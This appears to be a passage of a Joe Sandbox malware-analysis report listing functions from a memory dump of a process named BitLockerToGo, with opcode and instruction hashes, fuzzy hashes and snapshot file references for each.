Opcode Fuzzy Hash: afb9bf7af0c52e12cec270210b3c917e5f4d906ee0016125684edbc27e5ce19c
Instruction Fuzzy Hash: 7141BEB5A083418BD721CF15C880B6FFBB3BFD93A5F548A1CEA8517665C3319895CB82

Function 02FB4208 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

.), xrefs: 02FB4245

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: .)
API String ID: 0-141329343
Opcode ID: 3b46dfbdb886f2f2e5e65aed6300c01f31e364e4efa260a514e183b3334e8df4
Instruction ID: 46bdc99822a0fd11632eea58aa7875fd7849649345d2f1203b5d1f49605dfe4c
Opcode Fuzzy Hash: 3b46dfbdb886f2f2e5e65aed6300c01f31e364e4efa260a514e183b3334e8df4
Instruction Fuzzy Hash: CB41AC74908354CFD325CF24D5A07ABB3F2FF85384F044A2CE9869B681D7B49905DB86

Function 02FB408C Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

7452, xrefs: 02FB40C8

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 5d7a4b077ec80d6325fc7a2502bdf7ef3c81866e867218f95ffd584196b72868
Instruction ID: 37cbb52168d6f9f06c8296206f24590ba2cdfa384ec047e6526946bacaeee2dc
Opcode Fuzzy Hash: 5d7a4b077ec80d6325fc7a2502bdf7ef3c81866e867218f95ffd584196b72868
Instruction Fuzzy Hash: 85418175A093808BE31ACF52C9A4B6BF7E3FFD9388F144A1DE58657642C7B48801CB06

Function 02FD3870 Relevance: .9, Instructions: 864COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb286c6d67040c577d89d76cadaf909be27a23f823874883facafa93b92ee4d
Instruction ID: 82a5e3740e39b01bb422368e14a80a8b22b002d4f08322cc4e61b05caa1c93ef
Opcode Fuzzy Hash: efb286c6d67040c577d89d76cadaf909be27a23f823874883facafa93b92ee4d
Instruction Fuzzy Hash: B152DF36A49211CFD718CF28D4A062AF7F2FF89394F09896DD99A97781C734E950CB81

Function 02FA8050 Relevance: .8, Instructions: 768COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02734ade7b697e3e5cc6537e15cd95caad4b09c82fb22dcd0d61e35934a0a3a
Instruction ID: 8ac6a2e17c43ea5ac1b7b384d8a0c0702b919fa077bc07c1fd47175cee279fe9
Opcode Fuzzy Hash: f02734ade7b697e3e5cc6537e15cd95caad4b09c82fb22dcd0d61e35934a0a3a
Instruction Fuzzy Hash: 8E4209B2A083158BC724DF18D8906AEB3E2FFC4394F19892DDAD697345E774E851CB42

Function 02FA3920 Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e42fa2f9dd66c7f37e5d24ca4254acbe47fd7d975d50f3c3c7c331511dcd9c
Instruction ID: c07df3cef9615aa0ee8485157d84fef611115493c92ac0fcc03005d33c214d7b
Opcode Fuzzy Hash: 25e42fa2f9dd66c7f37e5d24ca4254acbe47fd7d975d50f3c3c7c331511dcd9c
Instruction Fuzzy Hash: 3962D0B1A087418FC319CF29C0A066AF7F2BF88354F188AADE5CA97355D775E845CB81

Function 02FBEE18 Relevance: .6, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8f5b5a570e2e215f5da83437d4e93c980a1d34090443cabee1922c820bcd95
Instruction ID: 3ce7b9676f2f12d1dadc1c2bc57b96c455a016b2795beafb407a57b9e5fc1dd9
Opcode Fuzzy Hash: 4a8f5b5a570e2e215f5da83437d4e93c980a1d34090443cabee1922c820bcd95
Instruction Fuzzy Hash: D932BE75A01B418FD325CF39C890762F7E2BF4A364F198A6CD6A687BA1C734E855CB40

Function 02FB60A0 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee659ceeb46723c751f19b53df0aa43ce6e670a162f00fce36928cf97bb526b8
Instruction ID: 1fcca4762472ebf2aab3650fe58a49ddd6298b53b8a120aae461ac80aa0bd108
Opcode Fuzzy Hash: ee659ceeb46723c751f19b53df0aa43ce6e670a162f00fce36928cf97bb526b8
Instruction Fuzzy Hash: 4E6217B0508B818ED372CB3C8848797BFE5AB1A314F084A9DD0FE8B792D7756505CB66

Function 02FA43C0 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3adeec2daee149d54bff2cfd11c68c388f44a12f7d63578fb90bdff759cd585
Instruction ID: 6a4bda84d6ec96d1cee8f66c3d69521f3571d55537440c9e0b534bfc3aebb7d3
Opcode Fuzzy Hash: b3adeec2daee149d54bff2cfd11c68c388f44a12f7d63578fb90bdff759cd585
Instruction Fuzzy Hash: 6C3235B1A14B108FC368CF29C5A062ABBF1BF85750B504A2ED69787F90D7B6F845CB14

Function 02FD3C30 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e5a9fd9cedf61f9004d0b0c61407484fa54eb076628f55a53ef05e3ace59e2
Instruction ID: 999ab550d25a0a525d2f4f8dfdac3c2e117205faca946cae2ef221b4ca76083d
Opcode Fuzzy Hash: c3e5a9fd9cedf61f9004d0b0c61407484fa54eb076628f55a53ef05e3ace59e2
Instruction Fuzzy Hash: 6412AF36A49251CFC718CF28E49062AF7E2FF89395F098D6DD99997341C370E960CB81

Function 02FC0A6F Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1777a31fbb1fe6e577fcb2c1970e601f9e7d0a6891295448d51c9d8b6eb86a4
Instruction ID: 13a2da710aeb19117d60778898ae3c4628429438e23174e1071fbe4bf59a213a
Opcode Fuzzy Hash: e1777a31fbb1fe6e577fcb2c1970e601f9e7d0a6891295448d51c9d8b6eb86a4
Instruction Fuzzy Hash: C7127171200641CFD329CF29C490B16BBF2FF89344F658A5DD9A68B796CB75E802CB90

Function 02FA6480 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67f84b68d8480242d3482d4446368247ff743ce665c622d7af38bcbd0db19e6
Instruction ID: 6c4d9304a4b1b462db1e973506d85524167fc4b9465b052e271c5ca46291b362
Opcode Fuzzy Hash: a67f84b68d8480242d3482d4446368247ff743ce665c622d7af38bcbd0db19e6
Instruction Fuzzy Hash: 6B02B2756083409FC718CF19C89076AFBE6BFC9308F18896DE5898B351E776D846CB92

Function 02FBDAF0 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88a361bf965fcba2411ba6cc1e1c77fd3c272b3e7275cd4a013cae3424e9d4eb
Instruction ID: 3ee7a6f7c0a8ae16f9fae5c2fdd205c0e1080f5f7a02728ca17625bdaa5409dc
Opcode Fuzzy Hash: 88a361bf965fcba2411ba6cc1e1c77fd3c272b3e7275cd4a013cae3424e9d4eb
Instruction Fuzzy Hash: D8C1B0B6A083019BD715CE2AC4807ABB7E2EFC9794F18892CE68987341D775DC45CB87

Function 02FBF662 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a11f573cef9cbd5d46cbff69a54cfd6f12926ba469cf3f2f978c96da9f8c78
Instruction ID: 9985b5b140d299a0c9cb885410c643ceb66c1f0de61b49a237da31ed17fe05b2
Opcode Fuzzy Hash: 07a11f573cef9cbd5d46cbff69a54cfd6f12926ba469cf3f2f978c96da9f8c78
Instruction Fuzzy Hash: 25D19175A00B018FD729CF29C890A22F7F2FF89354B248A6CD5968BB91D735F851CB90

Function 02FD32F5 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5250fdfd550f27281742814f16b7373c3f683dc015ecfd04e9de984b7a69c2
Instruction ID: 892f227ac84f74555383d489dc8b1c04ac51ddafab58a4f73ec35bd7d4cc8e31
Opcode Fuzzy Hash: 5a5250fdfd550f27281742814f16b7373c3f683dc015ecfd04e9de984b7a69c2
Instruction Fuzzy Hash: 7ED1FF76A05645CFC728CF38D490626F7E3BB99394B198A6DC596C3B81D331F961CB80

Function 02FD4120 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfde036f61e6db58f30ee7a59fa8e69b4e4c47c0c0e3f77ae2a4d81808c2a68
Instruction ID: fc1a76b14ad98740b1907b8432872cc4520b45b2d670e6194f53a0f90258f584
Opcode Fuzzy Hash: 9bfde036f61e6db58f30ee7a59fa8e69b4e4c47c0c0e3f77ae2a4d81808c2a68
Instruction Fuzzy Hash: E0B1E132A09251CFD708CF28D4A066AFBE2FF89354F098E6DE9D997380C7749950CB81

Function 02FBD00A Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5618bd7f34e9fa450d471485b178d2eee52fbba475aa8f24a329b377627d02
Instruction ID: 91bc19a95226a3719200c5a3d4c633492cc58fc1d878ff0bdd4adaa492a04a30
Opcode Fuzzy Hash: 5b5618bd7f34e9fa450d471485b178d2eee52fbba475aa8f24a329b377627d02
Instruction Fuzzy Hash: E7B156B5A09305EFE305CF69C880A6BB7E2FF88388F54892DF58587252D774E855CB42

Function 02FC02C9 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8061439b5a0b4f73910131f47339ea41f23d9469ab8e1938ad764489faad52
Instruction ID: 8e466fb36464e0d14738223d6e4e1f56d9a59f100f41ccd2e39de1de7e17f9ff
Opcode Fuzzy Hash: 8f8061439b5a0b4f73910131f47339ea41f23d9469ab8e1938ad764489faad52
Instruction Fuzzy Hash: F3A17A71600602CFD725CF28C9A0B26B7F2FF89344F24895CD5968BB95E775E812CB94

Function 02FD5880 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32dfc917c6a02b6867287b7f6c71eb6edfc976ac98bb84085ce3fba14193da6
Instruction ID: 9cbebbac863d464cf3d3d601e1b149c33fd492f270753418c62c8f7bcedd54b8
Opcode Fuzzy Hash: a32dfc917c6a02b6867287b7f6c71eb6edfc976ac98bb84085ce3fba14193da6
Instruction Fuzzy Hash: D1A1D175A043128FC711CF28C890A6EB7E2FF88794F59892CEA9597351D730EC54CB92

Function 02FCC1A7 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9106ea059bb292e74c9f6aaa4aa50dabe24898b0188e3dcda137f21a9e96a8
Instruction ID: bad0c11dafbfce63ff8271ab0c7d35e0f63d8dfed12845dd017fadfb1cfca57a
Opcode Fuzzy Hash: bf9106ea059bb292e74c9f6aaa4aa50dabe24898b0188e3dcda137f21a9e96a8
Instruction Fuzzy Hash: 5CE15C61608BC28EC326CB3C8484702FFE16B66224F58879DD5EA4F7E3C764D586C7A5

Function 02FD51F0 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ae86cec74db82df8738e365ac53423e0a6084e46686fabec553c77f458c2bfd
Instruction ID: ebf37ff243ff5cc14825b4a91458cd031d8f938e5134e2ae6576b38c36b70f69
Opcode Fuzzy Hash: 8ae86cec74db82df8738e365ac53423e0a6084e46686fabec553c77f458c2bfd
Instruction Fuzzy Hash: DA919E75A083029BD710CF28C880B6BB7E3FF85799F58891CE9889B251D734ED558B92

Function 02FD5540 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9621401020f1a2a3a04c0298e2a47e52c8441ba4d703c41060bf1c84d7e39a7e
Instruction ID: 24440962eb66c3bddd089a628c8ff02b2896aba7febf785e02898ae1c098ea4c
Opcode Fuzzy Hash: 9621401020f1a2a3a04c0298e2a47e52c8441ba4d703c41060bf1c84d7e39a7e
Instruction Fuzzy Hash: 10A18E79A043168FD714CF28C480A6AB7E3FF94794F998A1CEA9587364D730EC51CB92

Function 02FBFF44 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a759996b8ec49ff41ad3b58ae4113e4e131ebee1c312e8058dff37dfce408bb
Instruction ID: a9d64c8f167fdf3e51b61792ef5b101e4ba67156171560cb822dc2fb1b78c66d
Opcode Fuzzy Hash: 9a759996b8ec49ff41ad3b58ae4113e4e131ebee1c312e8058dff37dfce408bb
Instruction Fuzzy Hash: D6A14874A41701CFD324CF28C990B22B3B2FF8A754F15895CD6868BBA5DB75E852CB90

Function 02FD5BD0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2731938accc87f5bd9708da261053e2210c1516bae19160dd169ac5ed1f071d0
Instruction ID: 519e2224a202bef1c1db895532e16f58863b8105ec59b492bbccfa543b1234a6
Opcode Fuzzy Hash: 2731938accc87f5bd9708da261053e2210c1516bae19160dd169ac5ed1f071d0
Instruction Fuzzy Hash: BF91BE71A083019BD715DF28C890B2BB7E2FF84354F588A2CE6DA87391D735E851CB92

Function 02FBD410 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c50593294d860021f6a3e77a2a86176b05f44e00822b27791b594a2a05db884
Instruction ID: f910522a60936a295e7d89a82e7b54a12dbb3f3ba7d95b46630aeceb6dd5c70a
Opcode Fuzzy Hash: 1c50593294d860021f6a3e77a2a86176b05f44e00822b27791b594a2a05db884
Instruction Fuzzy Hash: CE9176B5A09345DFE304CF29C890A6BB7E2FF89389F54882DF58687252D738D841CB42

Function 02FAE370 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84b38a99ec90043f08143c19e1d2d0b8dc4494ede76e71389e37bf8977e4b5b
Instruction ID: a8e499972bfc69fe829993e5c11a13cae11ecbc15a8b64abac684b1645d246ce
Opcode Fuzzy Hash: f84b38a99ec90043f08143c19e1d2d0b8dc4494ede76e71389e37bf8977e4b5b
Instruction Fuzzy Hash: 497159B06093428FD304CF24D8A4B5BFBE6EF85344F148C2DE885C7292E739D85A8B56

Function 02FD36E0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec8264e6bd846bd33a4bff9cc4a481c17c5708b6bcf577986d14274da876037
Instruction ID: 6a2e500ba18e29f822dcc9882040287673cc0018efc89f57bcbc258359c529e0
Opcode Fuzzy Hash: dec8264e6bd846bd33a4bff9cc4a481c17c5708b6bcf577986d14274da876037
Instruction Fuzzy Hash: 4E817076A45609CFC724CF39E490612B3F3FB99395B598AADC58683641D331F962CF80

Function 02FCCA70 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3bbd45dada48a0f68331b41813a519b910d01b1e984a3114082a4d4344c5c22
Instruction ID: 89ee81a626add9488548ccf052ffd4bb9ebb733b38649ccb93ef21bfbc363fc7
Opcode Fuzzy Hash: d3bbd45dada48a0f68331b41813a519b910d01b1e984a3114082a4d4344c5c22
Instruction Fuzzy Hash: 26516AB19083558FE314DF29D89435BBBE1BBC8358F144A2EE5E983350E379D6088B82

Function 02FD4EF0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db56c4422abebeebe45d4c46a721fecedbe6f352833608047508dbc79adb695
Instruction ID: a8ba3725a643090f3e3a1a9a0e443f87ba6bbc423de2d23fe8ceb065643d3d92
Opcode Fuzzy Hash: 4db56c4422abebeebe45d4c46a721fecedbe6f352833608047508dbc79adb695
Instruction Fuzzy Hash: D151BB75A083069FE314CF18C894B2EF7E3EBC4B54F98891CE6C997291C735A851CB92

Function 02FB39D9 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad96e80b255389cbcfdcc8d0ea31ab0361cef73aa0205d3f8cceb8c2882dcc5c
Instruction ID: 5040ce38c533d60487a0588f06d82c1ccf614ae799c5a8ca4b50cdb01db70293
Opcode Fuzzy Hash: ad96e80b255389cbcfdcc8d0ea31ab0361cef73aa0205d3f8cceb8c2882dcc5c
Instruction Fuzzy Hash: A851AAB5908345DFD7159F24D9A0A6BB3F2FFC6384F008A5DF98A8B291E7748801CB56

Function 02FAE28D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9421e3e594f3c8b2fcd48f8cac6dce8fec9a9ca2325fa9308152f68d0b709a94
Instruction ID: edb260252ef49dbe55b4a275c7a041d07a153b0496f712cfb9bb3da52dad39a9
Opcode Fuzzy Hash: 9421e3e594f3c8b2fcd48f8cac6dce8fec9a9ca2325fa9308152f68d0b709a94
Instruction Fuzzy Hash: BD519B7161D2808FD354DF28D8A0BAEBBE6EF84345F549C2CE4C9C3261D73A8891CB16

Function 02FBB120 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c8910e0a70a88d04fda4d9c652c65aa870f0fc3f77ac7ecb601d2da0a0356
Instruction ID: d50c790423ec10a2b291328209b82ca7db185af05bfbec7fd373921db6651c73
Opcode Fuzzy Hash: 9c6c8910e0a70a88d04fda4d9c652c65aa870f0fc3f77ac7ecb601d2da0a0356
Instruction Fuzzy Hash: 5B41D1B5A083449BD770DF68EC80BDBB3A1EB85388F50893DE299C7381EB7495558B43

Function 02FB3BE1 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2803e8f7a06a11fe9efac1f1e8ede6e2fc5c79bb967c7690f6ca68bdaf12a9cc
Instruction ID: 15bf54a6da5c08a0137d1f940c59516625c39f154695ab19ab2dc2583ca28218
Opcode Fuzzy Hash: 2803e8f7a06a11fe9efac1f1e8ede6e2fc5c79bb967c7690f6ca68bdaf12a9cc
Instruction Fuzzy Hash: DC31CB729083588BC7159F14C860AABB3F2FF8A394F014A1CF9A29B390D374D901CB86

Function 02FACB00 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e869dd72f80a8aefc7fb3792dca412ecc06fe942eeca23ddac299739ad9442
Instruction ID: 5d498f595c34e8d29b726ef883938583d40a2e24bf527dcb3ab864f8c443555a
Opcode Fuzzy Hash: 59e869dd72f80a8aefc7fb3792dca412ecc06fe942eeca23ddac299739ad9442
Instruction Fuzzy Hash: A64103B6B1C2A00FD318DE3E88A412ABBD2ABC5694F09C63EF1E5872D4E675C605D750

Function 02FCADC0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 28ac7fb3617a44d609dbf0c85b5a43cbcf6f9fc806b6dd57756990e9314f1e8b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3C114833B041EA4EC3128D3D85405A5BFA30A93174F2D839DF5F89B2D2D6239D8AC3A0

Function 02FC1420 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a05834b11e70a7ae411071d1c8c66728a86832008ab2a256195acbcfd6d7e7
Instruction ID: 8e6a1330c80e65c0cb458c83e0ec6faf5525e925fc6f7fc2e152bc0d36403bed
Opcode Fuzzy Hash: 31a05834b11e70a7ae411071d1c8c66728a86832008ab2a256195acbcfd6d7e7
Instruction Fuzzy Hash: 280175F5F0030257EB20AE54DBD073BB2A99F867C8F28452CD60E57202DB76E8259691

Function 02FC01EF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
